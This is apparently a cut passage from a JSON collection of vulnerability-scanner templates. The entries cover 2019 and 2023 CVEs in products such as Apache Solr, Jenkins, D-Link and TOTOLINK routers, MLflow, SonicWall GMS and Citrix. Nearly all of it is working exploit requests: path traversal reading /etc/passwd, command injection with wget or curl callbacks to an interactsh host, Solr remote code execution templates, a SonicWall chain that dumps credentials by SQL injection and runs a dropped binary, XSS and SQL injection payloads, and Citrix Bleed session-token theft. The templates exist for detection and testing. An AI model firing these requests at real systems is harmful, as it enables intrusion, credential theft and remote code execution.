Forgery","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wavemaker/studioService.download?method=getContent&inUrl=file///etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-1898","info":{"name":"Cisco RV110W RV130W RV215W Router - Information leakage","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/_syslog.txt"],"headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(to_lower(body), \"ethernet\") && contains(to_lower(body), \"connection\")","contains(header, \"application/octet-stream\")"],"condition":"and"}]}]},{"id":"CVE-2019-20933","info":{"name":"InfluxDB <1.7.6 - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/query?db=db&q=SHOW%20DATABASES"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"results\":","\"name\":\"databases\""],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-17558","info":{"name":"Apache Solr <=8.3.1 - Remote Code Execution","severity":"high"},"requests":[{"raw":["GET /solr/admin/cores?wt=json HTTP/1.1\nHost: {{Hostname}}\n","POST /solr/{{core}}/config HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\n    \"update-queryresponsewriter\": {\n      \"startup\": \"lazy\",\n      \"name\": \"velocity\",\n      \"class\": \"solr.VelocityResponseWriter\",\n      \"template.base.dir\": \"\",\n      \"solr.resource.loader.enabled\": \"true\",\n      \"params.resource.loader.enabled\": \"true\"\n    }\n}\n","GET /solr/{{core}}/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27curl%20{{interactsh-url}}%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end HTTP/1.1\nHost: {{Hostname}}\nConnection: close\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"core","group":1,"regex":["\"name\"\\:\"(.*?)\""],"internal":true}]}]},{"id":"CVE-2019-17270","info":{"name":"Yachtcontrol Webapplication 1.0 - Remote Command Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/pages/systemcall.php?command=cat%20/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-16278","info":{"name":"nostromo 1.9.6 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.1\nHost: {{Hostname}}\n\necho\necho\ncat /etc/passwd 2>&1\n"],"matchers":[{"type":"regex","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2019-10475","info":{"name":"Jenkins build-metrics 1.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/plugin/build-metrics/getBuildStats?label=%22%3E%3Csvg%2Fonload%3Dalert(1337)%3E&range=2&rangeUnits=Weeks&jobFilteringType=ALL&jobFilter=&nodeFilteringType=ALL&nodeFilter=&launcherFilteringType=ALL&launcherFilter=&causeFilteringType=ALL&causeFilter=&Jenkins-Crumb=4412200a345e2a8cad31f07e8a09e18be6b7ee12b1b6b917bc01a334e0f20a96&json=%7B%22label%22%3A+%22Search+Results%22%2C+%22range%22%3A+%222%22%2C+%22rangeUnits%22%3A+%22Weeks%22%2C+%22jobFilteringType%22%3A+%22ALL%22%2C+%22jobNameRegex%22%3A+%22%22%2C+%22jobFilter%22%3A+%22%22%2C+%22nodeFilteringType%22%3A+%22ALL%22%2C+%22nodeNameRegex%22%3A+%22%22%2C+%22nodeFilter%22%3A+%22%22%2C+%22launcherFilteringType%22%3A+%22ALL%22%2C+%22launcherNameRegex%22%3A+%22%22%2C+%22launcherFilter%22%3A+%22%22%2C+%22causeFilteringType%22%3A+%22ALL%22%2C+%22causeNameRegex%22%3A+%22%22%2C+%22causeFilter%22%3A+%22%22%2C+%22Jenkins-Crumb%22%3A+%224412200a345e2a8cad31f07e8a09e18be6b7ee12b1b6b917bc01a334e0f20a96%22%7D&Submit=Search"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg/onload=alert(1337)>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-3799","info":{"name":"Spring Cloud Config Server - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/test/pathtraversal/master/..%252f..%252f..%252f..%252f../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-19824","info":{"name":"TOTOLINK Realtek SD Routers - Remote Command Injection","severity":"high"},"requests":[{"raw":["POST /boafrm/formSysCmd HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic YWRtaW46cGFzc3dvcmQ=\nContent-Type: application/x-www-form-urlencoded\n\nsubmit-url=%2Fsyscmd.htm&sysCmdselect=5&sysCmdselects=0&save_apply=Run+Command&sysCmd=wget+http://{{interactsh-url}}\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2019-9618","info":{"name":"WordPress GraceMedia Media Player 1.0 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200,500]}]}]},{"id":"CVE-2019-10405","info":{"name":"Jenkins <=2.196 - Cookie Exposure","severity":"medium"},"requests":[{"raw":["GET {{BaseURL}}/whoAmI/ HTTP/1.1\nHost: {{Hostname}}\n","GET {{BaseURL}}/whoAmI/ HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html","x-jenkins"],"case-insensitive":true,"condition":"and"},{"type":"word","part":"body_2","words":["Cookie","JSESSIONID"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"kval","kval":["x_jenkins"]}]}]},{"id":"CVE-2019-16920","info":{"name":"D-Link Routers - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /apply_sec.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nReferer: {{BaseURL}}\n\nhtml_response_page=login_pic.asp&login_name=YWRtaW4%3D&log_pass=&action=do_graph_auth&login_n=admin&tmp_log_pass=&graph_code=&session_id=62384\n","POST /apply_sec.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nReferer: {{BaseURL}}/login_pic.asp\nCookie: uid=1234123\n\nhtml_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0a{{url_encode('cat /etc/passwd')}}\n","POST /apply_sec.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nReferer: {{BaseURL}}/login_pic.asp\nCookie: uid=1234123\n\nhtml_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0a{{url_encode('type C:\\\\Windows\\\\win.ini')}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:","\\[(font|extension|file)s\\]"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-11370","info":{"name":"Carel pCOWeb <B1.2.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /config/pw_snmp_done.html HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n%3Fscript%3Asetdb%28%27snmp%27%2C%27syscontact%27%29=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\n","GET /config/pw_snmp.html HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body_2, \"text/html\")","status_code_2 == 200","contains(body_2, 'value=\\\"\\\"><script>alert(document.domain)</script>\\\"></td>')"],"condition":"and"}]}]},{"id":"CVE-2019-3401","info":{"name":"Atlassian Jira <7.13.3/8.0.0-8.1.1 - Incorrect Authorization","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/secure/ManageFilters.jspa?filter=popular&filterView=popular"],"matchers":[{"type":"word","words":["<span data-filter-field=\"owner-full-name\">","<title>Manage Filters - Jira</title>"],"condition":"and"}]}]},{"id":"CVE-2019-14223","info":{"name":"Alfresco Share - Open Redirect","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/share/page/dologin"],"body":"success=%2Fshare%2Fpage%2F&failure=:\\\\interact.sh&username=baduser&password=badpass\n","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*:\\s*)(?:https?://|//|\\\\)?(?:[a-zA-Z0-9\\-_]*\\.)?interact\\.sh(?:\\s*)$"]}]}]},{"id":"CVE-2019-16759","info":{"name":"vBulletin 5.0.0-5.5.4 - Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsubWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo%20md5%28%22CVE-2019-16759%22%29%3B\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["addcc9f9f2f40e2e6aca3079b73d9d17"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-0192","info":{"name":"Apache Solr - Deserialization of Untrusted Data","severity":"critical"},"requests":[{"raw":["GET /solr/admin/cores?wt=json HTTP/1.1\nHost: {{Hostname}}\n"],"extractors":[{"type":"json","name":"core_name","json":[".status | .[].name"],"internal":true}]},{"raw":["POST /solr/{{core_name}}/config HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"set-property\":{\"jmx.serviceUrl\":\"service:jmx:rmi:///jndi/rmi://{{interactsh-url}}/obj\"}}\n"],"matchers":[{"type":"dsl","dsl":["contains(interactsh_protocol, \"dns\")","contains(body, \"javax.management.remote.rmi\")","contains(content_type, \"text/plain\")","status_code == 500"],"condition":"and"}]}]},{"id":"CVE-2019-13396","info":{"name":"FlightPath - Local File Inclusion","severity":"medium"},"requests":[{"raw":["GET /login HTTP/1.1\nHost: {{Hostname}}\n","POST /flightpath/index.php?q=system-handle-form-submit HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json, text/plain, */*\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\ncallback=system_login_form&form_token={{token}}&form_include=../../../../../../../../../etc/passwd\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"token","group":1,"regex":["idden' name='form_token' value='([a-z0-9]+)'>"],"internal":true,"part":"body"}]}]},{"id":"CVE-2019-11869","info":{"name":"WordPress Yuzo <5.12.94 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-admin/options-general.php?page=yuzo-related-post HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nyuzo_related_post_css_and_style=</style><script>alert(0);</script>\n","GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_2, \"<script>alert(0);</script>\")"]},{"type":"dsl","dsl":["contains(tolower(header_2), 'text/html')"]}]}]},{"id":"CVE-2019-0193","info":{"name":"Apache Solr DataImportHandler <8.2.0 - Remote Code Execution","severity":"high"},"requests":[{"raw":["GET /solr/admin/cores?wt=json HTTP/1.1\nHost: {{Hostname}}\nAccept-Language: en\nConnection: close\n","POST /solr/{{core}}/dataimport?indent=on&wt=json HTTP/1.1\nHost: {{Hostname}}\nContent-type: application/x-www-form-urlencoded\nX-Requested-With: XMLHttpRequest\n\ncommand=full-import&verbose=false&clean=false&commit=true&debug=true&core=test&dataConfig=%3CdataConfig%3E%0A++%3CdataSource+type%3D%22URLDataSource%22%2F%3E%0A++%3Cscript%3E%3C!%5BCDATA%5B%0A++++++++++function+poc()%7B+java.lang.Runtime.getRuntime().exec(%22curl%20{{interactsh-url}}%22)%3B%0A++++++++++%7D%0A++%5D%5D%3E%3C%2Fscript%3E%0A++%3Cdocument%3E%0A++++%3Centity+name%3D%22stackoverflow%22%0A++++++++++++url%3D%22https%3A%2F%2Fstackoverflow.com%2Ffeeds%2Ftag%2Fsolr%22%0A++++++++++++processor%3D%22XPathEntityProcessor%22%0A++++++++++++forEach%3D%22%2Ffeed%22%0A++++++++++++transformer%3D%22script%3Apoc%22+%2F%3E%0A++%3C%2Fdocument%3E%0A%3C%2FdataConfig%3E&name=dataimport\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: curl"]}],"extractors":[{"type":"regex","name":"core","group":1,"regex":["\"name\"\\:\"(.*?)\""],"internal":true}]}]},{"id":"CVE-2019-3396","info":{"name":"Atlassian Confluence Server - Path Traversal","severity":"critical"},"requests":[{"raw":["POST /rest/tinymce/1/macro/preview HTTP/1.1\nHost: {{Hostname}}\nReferer: {{Hostname}}\n\n{\"contentId\":\"786457\",\"macro\":{\"name\":\"widget\",\"body\":\"\",\"params\":{\"url\":\"https://www.viddler.com/v/23464dc5\",\"width\":\"1000\",\"height\":\"1000\",\"_template\":\"../web.xml\"}}}\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["<param-name>contextConfigLocation</param-name>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-15829","info":{"name":"Gallery Photoblocks < 1.1.43 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=photoblocks-edit&id=%22%3E%3Csvg%2Fonload%3Dalert(document.domain)%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"<svg/onload=alert(document.domain)>\")","contains(body_2, \"post galleries!\")"],"condition":"and"}]}]},{"id":"CVE-2019-2579","info":{"name":"Oracle Fusion Middleware WebCenter Sites 12.2.1.3.0 - SQL Injection","severity":"medium"},"requests":[{"raw":["GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/WebReferences HTTP/1.1\nHost: {{Hostname}}\n","POST /cs/ContentServer HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_authkey_={{authkey}}&pagename=OpenMarket%2FXcelerate%2FAdmin%2FWebReferences&op=search&urlsToDelete=&resultsPerPage=25&searchChoice=webroot&searchText=%27+and+%271%27%3D%270+--+\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["value='&#39; and &#39;1&#39;=&#39;0 --","Use this utility to view and manage URLs"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"authkey","group":1,"regex":["NAME='_authkey_' VALUE='([0-9A-Z]+)'>"],"internal":true,"part":"body"}]}]},{"id":"CVE-2019-6799","info":{"name":"phpMyAdmin <4.8.5 - Local File Inclusion","severity":"medium"},"requests":[{"raw":["GET {{path}}?pma_servername={{interactsh-url}}&pma_username={{randstr}}&pma_password={{randstr}}&server=1 HTTP/1.1\nHost: {{Hostname}}\n"],"payloads":{"path":["/index.php","/pma/index.php","/pmd/index.php","/phpMyAdmin/index.php","/phpmyadmin/index.php","/_phpmyadmin/index.php"]},"attack":"batteringram","stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["compare_versions(version, '< 4.8.5')"]},{"type":"dsl","dsl":["compare_versions(version, '> 3.9.9')"]},{"type":"dsl","dsl":["compare_versions(phpversion, '< 7.3.4')"]},{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","words":["mysqli_real_connect"]},{"type":"word","words":["pma_servername"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"version","group":1,"regex":["\\?v=([0-9.]+)"],"internal":true},{"type":"regex","group":1,"regex":["\\?v=([0-9.]+)"]},{"type":"regex","name":"phpversion","group":1,"regex":["X-Powered-By: PHP/([0-9.]+)"],"internal":true,"part":"header"}]}]},{"id":"CVE-2019-15858","info":{"name":"WordPress Woody Ad Snippets <2.2.5 - Cross-Site Scripting/Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/insert-php/readme.txt"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","negative":true,"words":["2.2.5"]},{"type":"word","part":"body","words":["Changelog"]},{"type":"word","part":"body","words":["Woody ad snippets"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-16996","info":{"name":"Metinfo 7.0.0 beta - SQL Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/?n=product&c=product_admin&a=dopara&app_type=shop&id=1%20union%20SELECT%201,2,3,25367*75643,5,6,7%20limit%205,1%20%23"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["1918835981"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-1177","info":{"name":"Mlflow <2.2.1 - Local File Inclusion","severity":"critical"},"requests":[{"raw":["POST /ajax-api/2.0/mlflow/registered-models/create HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json; charset=utf-8\n\n{\"name\":\"{{randstr}}\"}\n","POST /ajax-api/2.0/mlflow/model-versions/create HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json; charset=utf-8\n\n{\"name\":\"{{randstr}}\",\"source\":\"file:///etc/\"}\n","GET /model-versions/get-artifact?path=passwd&name=AJAX-API&version={{version}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"version","group":1,"regex":["\"version\": \"([0-9.]+)\","],"internal":true,"part":"body"}]}]},{"id":"CVE-2023-31548","info":{"name":"ChurchCRM v4.5.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /session/begin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nUser={{username}}&Password={{password}}\n","POST /FundRaiserEditor.php?linkBack=&FundRaiserID=-1 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nFundRaiserSubmit=Save&Date=2023-06-24&Title=%22+onfocus%3D%22alert%28document.domain%29%22+autofocus%3D%22&Description=test\n"],"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"onfocus=\\\"alert(document.domain)\\\" autofocus=\\\"\\\"></td>\")","contains(body_2, \"ChurchCRM\")"],"condition":"and"}]}]},{"id":"CVE-2023-3765","info":{"name":"MLflow Absolute Path Traversal","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/ajax-api/2.0/mlflow-artifacts/artifacts?path=C:/"],"matchers-condition":"and","matchers":[{"type":"word","words":["\"is_dir\":","\"path\":","\"files\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-0602","info":{"name":"Twittee Text Tweet <= 1.0.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=vxcf_leads&form_id=cf_5&status&tab=entries&search&order=asc&orderby=file-438&field&time&start_date&end_date=onobw%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3ez2u4g HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains_all(body_2, \"<script>alert(document.domain)</script>\", \"twittee\")"],"condition":"and"}]}]},{"id":"CVE-2023-43261","info":{"name":"Milesight Routers - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/lang/log/httpd.log"],"max-size":5000,"extractors":[{"type":"regex","regex":["\"username\":\"([^\"]+)\",\"password\":\"(?:[A-Za-z0-9+/]{4})*(?:[A-Za-z0-9+/]{2}==|[A-Za-z0-9+/]{3}=)\""]}]}]},{"id":"CVE-2023-39110","info":{"name":"rConfig 3.9.4 - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["GET /login.php HTTP/1.1\nHost: {{Hostname}}\n","POST /lib/crud/userprocess.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser={{username}}&pass={{password}}&sublogin=1\n","GET /lib/ajaxHandlers/ajaxGetFileByPath.php?path=file://localhost/etc/passwd HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"matchers-condition":"and","matchers":[{"type":"regex","part":"body_3","regex":["root:.*:0:0:"]},{"type":"word","part":"body_1","words":["rConfig"]},{"type":"status","part":"header_3","status":[200]}]}]},{"id":"CVE-2023-2822","info":{"name":"Ellucian Ethos Identity CAS - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/cas/logout?url=https://oast.pro\"><img%20src=x%20onerror=alert(document.domain)>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=x onerror=alert(document.domain)>","Identity Server"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-24044","info":{"name":"Plesk Obsidian <=18.0.49 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/login.php"],"headers":{"Host":"oast.me"},"matchers-condition":"and","matchers":[{"type":"word","part":"location","words":["https://oast.me/login_up.php"]},{"type":"status","status":[303]}]}]},{"id":"CVE-2023-4966","info":{"name":"Citrix Bleed - Leaking Session Tokens","severity":"high"},"requests":[{"raw":["GET /oauth/idp/.well-known/openid-configuration HTTP/1.1\n{{str}}: {{Hostname}}\nHost: {{payload}}\n\n","POST /logon/LogonPoint/Authentication/GetUserName HTTP/1.1\nHost: {{Hostname}}\nCookie: NSC_AAAC={{session}}\n\n"],"unsafe":true,"extractors":[{"type":"regex","name":"session","part":"body_1","group":1,"regex":["([a-f0-9]{100}45525d5f4f58455e445a4a42)"],"internal":true},{"type":"regex","part":"body_2","regex":["([a-z0-9._]+)"]}],"matchers-condition":"and","matchers":[{"type":"word","words":["NSC_AAAC=","HTTP/1.1"]},{"type":"word","words":["{\"issuer\":"]}]}]},{"id":"CVE-2023-2948","info":{"name":"OpenEMR < 7.0.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/library/custom_template/share_template.php?list_id=1}});}}alert(document.domain);function%20x(){if(1){a=({a:{a:1"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(header, \"text/html\")","contains_all(body, \"list_id: 1}});}}alert(document.domain);\", \"select at least one Provider\", \"Save</span>\")"],"condition":"and"}]}]},{"id":"CVE-2023-34124","info":{"name":"SonicWall GMS and Analytics Web Services - Shell Injection","severity":"critical"},"requests":[{"raw":["GET /ws/msw/tenant/%27%20union%20select%20%28select%20ID%20from%20SGMSDB.DOMAINS%20limit%201%29%2C%20%27%27%2C%20%27%27%2C%20%27%27%2C%20%27%27%2C%20%27%27%2C%20%28select%20concat%28id%2C%20%27%3A%27%2C%20password%29%20from%20sgmsdb.users%20where%20active%20%3D%20%271%27%20order%20by%20issuperadmin%20desc%20limit%201%20offset%200%29%2C%27%27%2C%20%27%27%2C%20%27 HTTP/1.1\nHost: {{Hostname}}\nAuth: {\"user\": \"system\", \"hash\": \"{{base64(hex_decode(auth))}}\"}\n","GET /appliance/login HTTP/1.1\nHost: {{Hostname}}\n","POST /appliance/applianceMainPage HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=login&skipSessionCheck=0&needPwdChange=0&clientHash={{ md5(concat(servertoken,replace_regex(alias,\"^.*:\",\"\"))) }}&password={{replace_regex(alias,\"^.*:\",\"\")}}&applianceUser={{replace_regex(alias,\":.*$\",\"\")}}&appliancePassword=Nice%20Try&ctlTimezoneOffset=0\n","POST /appliance/applianceMainPage HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnum=3232150&action=file_system&task=search&item=application_log&criteria=*&width=500&searchFolder=%2Fopt%2FGMSVP%2Fetc%2F&searchFilter=appliance.jar%3Bbash+-c+PLUS%3d\\$\\(echo\\+-e\\+begin-base64\\+755\\+a\\\\\\\\nKwee\\\\\\\\n\\%3d\\%3d\\%3d\\%3d\\+\\|\\+uudecode\\+-o-\\)\\%3becho\\+-e\\+begin-base64\\+755\\+/tmp/.{{filename}}\\\\\\\\n{{replace(base64(callback),\"+\",\"${PLUS}\")}}\\\\\\\\n\\%3d\\%3d\\%3d\\%3d\\+|+uudecode+%3b/tmp/.{{filename}}%3brm+/tmp/.{{filename}}%3becho+\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_3","words":["<title>SonicWall Universal Management Appliance</title>","<title>SonicWall Universal Management Host</title>"],"condition":"or"},{"type":"word","part":"interactsh_protocol","words":["dns"]}],"extractors":[{"type":"json","part":"body","internal":true,"name":"alias","group":1,"json":[".alias"]},{"type":"regex","part":"body","internal":true,"name":"servertoken","group":1,"regex":["getPwdHash.*,'([0-9]+)'"]}]}]},{"id":"CVE-2023-2780","info":{"name":"Mlflow <2.3.1 - Local File Inclusion Bypass","severity":"critical"},"requests":[{"raw":["POST /ajax-api/2.0/mlflow/registered-models/create HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json; charset=utf-8\n\n{\"name\":\"{{randstr}}\"}\n","POST /ajax-api/2.0/mlflow/model-versions/create HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json; charset=utf-8\n\n{\"name\":\"{{randstr}}\",\"source\":\"file://./etc\"}\n","GET /model-versions/get-artifact?path=passwd&name={{randstr}}&version={{version}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"version","group":1,"regex":["\"version\": \"([0-9.]+)\","],"internal":true,"part":"body"}]}]},{"id":"CVE-2023-39560","info":{"name":"ECTouch v2 - SQL Injection","severity":"critical"},"requests":[{"raw":["GET /index.php?m=default&c=user&a=register&u=0 HTTP/1.1\nHost: {{Hostname}}\nReferer: 554fcae493e564ee0dc75bdf2ebf94cabought_notes|a:1:{s:2:\"id\";s:49:\"0&&updatexml(1,concat(0x7e,(database()),0x7e),1)#\";}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["XPATH syntax error: '~[^~]+~'<br>"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","part":"body","group":1,"regex":["XPATH syntax error: '~([a-z0-9]+)~'"]}]}]},{"id":"CVE-2023-27640","info":{"name":"PrestaShop tshirtecommerce - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/tshirtecommerce/fonts.php?name=2&type=./../index.php"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(header, \"text/html\")","contains_all(base64_decode(body), \"PrestaShop\", \"<?php\")"],"condition":"and"}]}]},{"id":"CVE-2023-29923","info":{"name":"PowerJob <=4.3.2 - Unauthenticated Access","severity":"medium"},"requests":[{"raw":["POST /job/list HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json;charset=UTF-8\n\n{\"appId\":1,\"index\":0,\"pageSize\":10}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{\"success\":true,\"data\":{\"index\":0,\"pageSize\":10,"]},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-26347","info":{"name":"Adobe Coldfusion - Authentication Bypass","severity":"high"},"requests":[{"raw":["GET /hax/..CFIDE/adminapi/administrator.cfc?method=getBuildNumber&_cfclient=true HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["wddxPacket version=","<string>"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-4151","info":{"name":"Store Locator WordPress < 1.4.13 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"body","words":["/wp-content/plugins/agile-store-locator"],"internal":true}]},{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin-ajax.php?action=asl_ajax_handler&asl-nounce=<img src onerror=alert`document.domain`> HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["<img src onerror=alert`document.domain`>"]},{"type":"word","part":"content_type_2","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-1263","info":{"name":"Coming Soon & Maintenance < 4.1.7 - Unauthenticated Post/Page Access","severity":"medium"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php 